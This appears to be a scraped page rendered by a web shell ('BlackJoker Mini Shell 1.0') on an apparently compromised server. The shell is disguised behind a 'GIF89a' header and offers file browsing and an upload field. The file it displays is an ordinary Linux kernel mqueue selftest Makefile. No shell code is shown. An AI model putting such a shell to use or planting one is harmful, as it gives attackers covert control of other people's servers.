GIF89a; Mini Shell

Mini Shell

Direktori : /lib/modules/3.10.0-1160.80.1.el7.centos.plus.x86_64/build/tools/testing/selftests/mqueue/
Upload File :
Current File : //lib/modules/3.10.0-1160.80.1.el7.centos.plus.x86_64/build/tools/testing/selftests/mqueue/Makefile

all:
	gcc -O2 -lrt mq_open_tests.c -o mq_open_tests
	gcc -O2 -lrt -lpthread -lpopt -o mq_perf_tests mq_perf_tests.c

run_tests:
	@./mq_open_tests /test1 || echo "mq_open_tests: [FAIL]"
	@./mq_perf_tests || echo "mq_perf_tests: [FAIL]"

clean:
	rm -f mq_open_tests mq_perf_tests

./BlackJoker Mini Shell 1.0